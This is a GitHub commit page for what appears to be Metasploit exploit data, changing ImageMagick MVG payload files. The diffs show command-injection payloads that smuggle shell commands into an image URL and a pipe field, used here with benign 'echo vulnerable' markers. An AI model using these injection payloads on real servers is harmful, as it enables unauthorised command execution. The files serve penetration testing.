Skip to content

Commit 9b15899

Browse files
committed
Add PS template
1 parent 6f4f2bf commit 9b15899

File tree

5 files changed

+4
-4
lines changed

5 files changed

+4
-4
lines changed

data/exploits/imagemagick/delegate/msf.mvg

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -3,6 +3,6 @@ encoding "UTF-8"
33
viewbox 0 0 1 1
44
affine 1 0 0 1 0 0
55
push graphic-context
6-
image Over 0,0 1,1 'https://localhost";echo vulnerable"'
6+
image Over 0,0 1,1 'https://localhost";echo vulnerable > /dev/tty"'
77
pop graphic-context
88
pop graphic-context
109 Bytes
Binary file not shown.
Lines changed: 1 addition & 1 deletion
Loading

data/exploits/imagemagick/popen/msf.mvg

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -3,6 +3,6 @@ encoding "UTF-8"
33
viewbox 0 0 1 1
44
affine 1 0 0 1 0 0
55
push graphic-context
6-
image Over 0,0 1,1 '|touch vulnerable'
6+
image Over 0,0 1,1 '|echo vulnerable > /dev/tty'
77
pop graphic-context
88
pop graphic-context
Lines changed: 1 addition & 1 deletion
Loading

0 commit comments

Comments
 (0)